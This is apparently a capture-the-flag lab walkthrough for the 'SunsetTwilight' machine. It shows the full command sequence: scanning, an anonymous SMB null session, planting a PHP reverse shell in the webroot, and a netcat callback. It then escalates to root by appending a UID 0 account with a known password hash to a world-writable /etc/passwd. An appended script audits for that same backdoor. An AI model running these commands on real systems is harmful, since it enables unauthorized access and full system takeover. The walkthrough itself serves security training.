# SunsetTwilight

## Nmap

```
sudo nmap 192.168.120.91 -p- -sS -sV

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
63525/tcp open  http        PHP cli server 5.5 or later
Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First up is checking SMB. We can connect and list the shares without providing credentials (a null session), as shown below:

```
smbclient -U '' -L \\\\192.168.120.91\\
```

![](/files/-MXH_-nS-S5g8LFM18wx)

We can then connect to the WRKSHARE share and view its contents:

```
smbclient -U '' \\\\192.168.120.91\\WRKSHARE\\
```

![](/files/-MXH_9QMnmfvy0zLeaDP)

The share appears to expose the target's filesystem from '/', so we can browse it for interesting information. Port 80 is open, so a web server is almost certainly running.

Listing /var/www/html/ through the share shows the PHP files served by Apache.

![](/files/-MXHaYo5E6fxZfcQmz5m)

If the share is also writable, we can upload a PHP reverse shell into the webroot and have Apache execute it for us. I used the following command to upload a [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell) with curl into the /var/www/html directory (the `$ip` and `$port` variables at the top of the pentestmonkey script must first be set to the attacking machine's address and the port the listener will use, here 80):

```
curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.120.91/WRKSHARE/var/www/html/phpshell.php
```

![](/files/-MXHarvm5uOAH6ey1wTS)

Checking the directory contents with `smbclient` again confirms the PHP reverse shell now sits in the webroot.

![](/files/-MXHb1EcpdRDBtSc64h1)

Set up a `netcat` listener on the port configured in the shell, then request the file with `curl` so that Apache executes it and the target connects back to us:

```
sudo nc -lvp 80
curl http://192.168.120.91/phpshell.php
```

![](/files/-MXHbXZaJ1Mh5XynWqh3)

The resulting shell can be upgraded to an interactive TTY with:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](/files/-MXHbhcmHiVdljtXFq4t)

Next, move into the /tmp/ directory (it is writable by every user), serve `linpeas.sh` from the attacking machine with Python's built-in HTTP server on port 80, and fetch it on the target:

```
wget http://192.168.49.120/linpeas.sh
```

`linpeas` picks up that /etc/passwd is world-writable, which means any user on the box, including our `www-data` shell, can append lines to it.

![](/files/-MXHckNG5MMw4BrozrCc)

As such we can add a new UID 0 account to the target machine and gain root. The trick is that if the second field of a passwd entry contains a password hash instead of `x`, the system authenticates against that hash directly rather than consulting /etc/shadow, so we never need write access to the shadow file.

Generate an MD5-crypt password hash on the attacking machine (the salt and password are both `password` here):

```
openssl passwd -1 -salt password password
```

Append a new entry with that hash, UID 0, GID 0, a home of /root and a bash login shell to the end of /etc/passwd on the target machine:

```
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
```

We can then `su owned` with the password `password` to switch into the new account and gain a root shell.

![](/files/-MXHd95LxAotOgP9xHf2)
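The two conditions this privesc relies on, scripted as a POSIX shell audit. This is an added example, not part of the original writeup: the functions check whether a passwd file is world-writable and whether it carries a UID 0 account other than root (the artefact the technique leaves behind), and `passwd_line` builds the entry appended above. It assumes `ls`, `awk`, `cut`, `chmod` and `mktemp` are available, and the sample passwd file is constructed inside the script rather than read from a real system.

```shell
#!/bin/sh
# Added example (not from the writeup): audit checks behind the
# world-writable /etc/passwd privesc, plus the helper that builds the
# injected line. The demo works on a constructed temporary file.

# Return 0 if the file's permission bits grant write to "other".
# The 9th character of `ls -ld` output is the o+w bit; this is portable
# across GNU and BSD ls, unlike the differing `stat` format flags.
is_world_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# Print every account with UID 0 whose name is not root. Any output from a
# real /etc/passwd means a backdoor root account has been added.
extra_uid0_users() {
    # passwd fields: name:password:uid:gid:gecos:home:shell
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Build the entry the writeup appends. A crypt-style hash in field 2 is used
# directly instead of the /etc/shadow lookup; UID/GID 0 makes it root.
# $1 = username, $2 = hash (for example from `openssl passwd -1`).
passwd_line() {
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$1" "$2" "$1"
}

# Demo on a constructed file rather than the real /etc/passwd.
demo() {
    f=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$f"
    printf 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n' >> "$f"
    chmod 644 "$f"
    is_world_writable "$f" && echo "unexpected: $f is world-writable"
    chmod 666 "$f"                      # reproduce the misconfiguration
    is_world_writable "$f" && echo "$f is world-writable, privesc possible"
    # Hash taken from the writeup: openssl passwd -1 -salt password password
    passwd_line owned '$1$password$Da2mWXlxe6J7jtww12SNG/' >> "$f"
    echo "extra UID-0 accounts: $(extra_uid0_users "$f")"
    rm -f "$f"
}
demo
```

Pointed at the real file (`is_world_writable /etc/passwd; extra_uid0_users /etc/passwd`), the first function reports the misconfiguration linpeas flagged and the second reports the `owned` account once the line has been appended, which is also the quickest post-incident check for this kind of backdoor. The fix on the defending side is `chmod 644 /etc/passwd` and removing any extra UID 0 entry.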
